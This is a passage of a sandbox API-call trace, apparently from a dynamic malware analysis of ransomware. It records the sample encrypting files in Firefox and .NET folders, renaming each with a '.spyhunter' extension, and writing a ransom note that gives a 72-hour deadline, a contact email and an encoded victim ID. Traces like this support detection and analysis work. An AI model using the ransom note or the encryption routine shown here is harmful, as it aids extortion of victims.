lpNumberOfBytesWritten=0x248e6cc*=0x4, lpOverlapped=0x0) returned 1 [0163.979] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6cc*=0x30, lpOverlapped=0x0) returned 1 [0163.979] CloseHandle (hObject=0xa0) returned 1 [0163.979] GetProcessHeap () returned 0x2c0000 [0163.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.979] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml.spyhunter") returned 84 [0163.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\yahoo.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\yahoo.xml.spyhunter")) returned 1 [0163.980] GetProcessHeap () returned 0x2c0000 [0163.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.980] GetProcessHeap () returned 0x2c0000 [0163.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.981] GetProcessHeap () returned 0x2c0000 [0163.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee57b0 | out: hHeap=0x2c0000) returned 1 [0163.981] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e710 | out: pbBuffer=0x248e710) returned 1 [0163.981] GetProcessHeap () returned 0x2c0000 [0163.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.981] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e708*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e708*=0x30) returned 1 [0163.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\ebay.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.983] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml") returned 73 [0163.983] StrStrW (lpFirst="eBay.xml", lpSrch=".txt") returned 0x0 [0163.983] GetProcessHeap () returned 0x2c0000 [0163.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0163.983] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e6cc*=0xa17, lpOverlapped=0x0) returned 1 [0164.110] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff5e9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.110] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xa17, lpNumberOfBytesWritten=0x248e6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e6cc*=0xa17, lpOverlapped=0x0) returned 1 [0164.110] GetProcessHeap () returned 0x2c0000 [0164.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0164.110] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.110] WriteFile (in: hFile=0xa0, lpBuffer=0x248e70c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6cc, lpOverlapped=0x0 | out: lpBuffer=0x248e70c*, lpNumberOfBytesWritten=0x248e6cc*=0x4, lpOverlapped=0x0) returned 1 [0164.110] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6cc*=0x30, lpOverlapped=0x0) returned 1 [0164.110] CloseHandle (hObject=0xa0) returned 1 [0164.110] GetProcessHeap () returned 0x2c0000 [0164.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.110] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml.spyhunter") returned 83 [0164.110] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\ebay.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\ebay.xml.spyhunter")) returned 1 [0164.111] GetProcessHeap () returned 0x2c0000 [0164.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.111] GetProcessHeap () returned 0x2c0000 [0164.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0164.111] GetProcessHeap () returned 0x2c0000 [0164.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee55f0 | out: hHeap=0x2c0000) returned 1 [0164.111] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e708 | out: pbBuffer=0x248e708) returned 1 [0164.111] GetProcessHeap () returned 0x2c0000 [0164.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0164.112] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e700*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e700*=0x30) returned 1 [0164.112] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0164.310] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png") returned 109 [0164.310] StrStrW (lpFirst="icon.png", lpSrch=".txt") returned 0x0 [0164.310] GetProcessHeap () returned 0x2c0000 [0164.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0164.310] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e6c4*=0x889, lpOverlapped=0x0) returned 1 [0164.311] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff777, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.312] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x889, lpNumberOfBytesWritten=0x248e6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e6c4*=0x889, lpOverlapped=0x0) returned 1 [0164.312] GetProcessHeap () returned 0x2c0000 [0164.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0164.312] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.312] WriteFile (in: hFile=0x9c, lpBuffer=0x248e704*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6c4, lpOverlapped=0x0 | out: lpBuffer=0x248e704*, lpNumberOfBytesWritten=0x248e6c4*=0x4, lpOverlapped=0x0) returned 1 [0164.312] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6c4*=0x30, lpOverlapped=0x0) returned 1 [0164.312] CloseHandle (hObject=0x9c) returned 1 [0164.312] GetProcessHeap () returned 0x2c0000 [0164.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0164.312] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png.spyhunter") returned 119 [0164.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png.spyhunter")) returned 1 [0164.313] GetProcessHeap () returned 0x2c0000 [0164.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0164.313] GetProcessHeap () returned 0x2c0000 [0164.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0164.313] GetProcessHeap () returned 0x2c0000 [0164.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eacac0 | out: hHeap=0x2c0000) returned 1 [0164.314] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e708 | out: pbBuffer=0x248e708) returned 1 [0164.314] GetProcessHeap () returned 0x2c0000 [0164.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0164.314] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e700*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e700*=0x30) returned 1 [0164.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\browsercomps.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\browsercomps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.329] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\browsercomps.dll") returned 78 [0164.329] StrStrW (lpFirst="browsercomps.dll", lpSrch=".txt") returned 0x0 [0164.330] GetProcessHeap () returned 0x2c0000 [0164.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0164.330] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e6c4*=0x2800, lpOverlapped=0x0) returned 1 [0164.353] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.353] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e6c4*=0x2800, lpOverlapped=0x0) returned 1 [0164.354] GetProcessHeap () returned 0x2c0000 [0164.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0164.354] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.354] WriteFile (in: hFile=0x178, lpBuffer=0x248e704*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6c4, lpOverlapped=0x0 | out: lpBuffer=0x248e704*, lpNumberOfBytesWritten=0x248e6c4*=0x4, lpOverlapped=0x0) returned 1 [0164.404] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6c4*=0x30, lpOverlapped=0x0) returned 1 [0164.404] CloseHandle (hObject=0x178) returned 1 [0164.404] GetProcessHeap () returned 0x2c0000 [0164.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.404] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\browsercomps.dll.spyhunter") returned 88 [0164.404] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\browsercomps.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\browsercomps.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\browsercomps.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\browsercomps.dll.spyhunter")) returned 1 [0164.405] GetProcessHeap () returned 0x2c0000 [0164.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.405] GetProcessHeap () returned 0x2c0000 [0164.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0164.405] GetProcessHeap () returned 0x2c0000 [0164.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb120 | out: hHeap=0x2c0000) returned 1 [0164.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.412] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.412] WriteFile (in: hFile=0x178, lpBuffer=0x248e637*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e760, lpOverlapped=0x0 | out: lpBuffer=0x248e637*, lpNumberOfBytesWritten=0x248e760*=0x127, lpOverlapped=0x0) returned 1 [0164.413] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.413] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e760, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e760*=0x2ac, lpOverlapped=0x0) returned 1 [0164.413] CloseHandle (hObject=0x178) returned 1 [0164.413] GetProcessHeap () returned 0x2c0000 [0164.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb048 | out: hHeap=0x2c0000) returned 1 [0164.413] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e700 | out: pbBuffer=0x248e700) returned 1 [0164.413] GetProcessHeap () returned 0x2c0000 [0164.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0164.413] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e6f8*=0x30) returned 1 [0164.413] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\stdole.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\stdole.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.414] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\stdole.dll") returned 78 [0164.415] StrStrW (lpFirst="stdole.dll", lpSrch=".txt") returned 0x0 [0164.415] GetProcessHeap () returned 0x2c0000 [0164.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0164.415] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e6bc*=0x2800, lpOverlapped=0x0) returned 1 [0164.434] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.434] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e6bc*=0x2800, lpOverlapped=0x0) returned 1 [0164.434] GetProcessHeap () returned 0x2c0000 [0164.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0164.434] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.435] WriteFile (in: hFile=0x178, lpBuffer=0x248e6fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6bc, lpOverlapped=0x0 | out: lpBuffer=0x248e6fc*, lpNumberOfBytesWritten=0x248e6bc*=0x4, lpOverlapped=0x0) returned 1 [0164.435] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6bc*=0x30, lpOverlapped=0x0) returned 1 [0164.435] CloseHandle (hObject=0x178) returned 1 [0164.435] GetProcessHeap () returned 0x2c0000 [0164.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.435] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\stdole.dll.spyhunter") returned 88 [0164.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\stdole.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\stdole.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\stdole.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\stdole.dll.spyhunter")) returned 1 [0164.436] GetProcessHeap () returned 0x2c0000 [0164.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.436] GetProcessHeap () returned 0x2c0000 [0164.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0164.436] GetProcessHeap () returned 0x2c0000 [0164.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeae68 | out: hHeap=0x2c0000) returned 1 [0164.436] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6f8 | out: pbBuffer=0x248e6f8) returned 1 [0164.436] GetProcessHeap () returned 0x2c0000 [0164.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0164.436] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e6f0*=0x30) returned 1 [0164.436] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\msdatasrc.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\msdatasrc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.438] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\msdatasrc.dll") returned 81 [0164.438] StrStrW (lpFirst="msdatasrc.dll", lpSrch=".txt") returned 0x0 [0164.438] GetProcessHeap () returned 0x2c0000 [0164.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0164.438] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0164.465] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.465] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x248e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0164.465] GetProcessHeap () returned 0x2c0000 [0164.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0164.465] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.465] WriteFile (in: hFile=0x178, lpBuffer=0x248e6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248e6f4*, lpNumberOfBytesWritten=0x248e6b4*=0x4, lpOverlapped=0x0) returned 1 [0164.465] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6b4*=0x30, lpOverlapped=0x0) returned 1 [0164.465] CloseHandle (hObject=0x178) returned 1 [0164.465] GetProcessHeap () returned 0x2c0000 [0164.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.466] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\msdatasrc.dll.spyhunter") returned 91 [0164.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\msdatasrc.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\msdatasrc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\msdatasrc.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\msdatasrc.dll.spyhunter")) returned 1 [0164.466] GetProcessHeap () returned 0x2c0000 [0164.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.466] GetProcessHeap () returned 0x2c0000 [0164.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0164.467] GetProcessHeap () returned 0x2c0000 [0164.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecefb0 | out: hHeap=0x2c0000) returned 1 [0164.467] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6f8 | out: pbBuffer=0x248e6f8) returned 1 [0164.467] GetProcessHeap () returned 0x2c0000 [0164.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0164.467] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e6f0*=0x30) returned 1 [0164.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.mshtml.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.467] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll") returned 88 [0164.468] StrStrW (lpFirst="Microsoft.mshtml.dll", lpSrch=".txt") returned 0x0 [0164.468] GetProcessHeap () returned 0x2c0000 [0164.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0164.468] ReadFile (in: hFile=0x178, 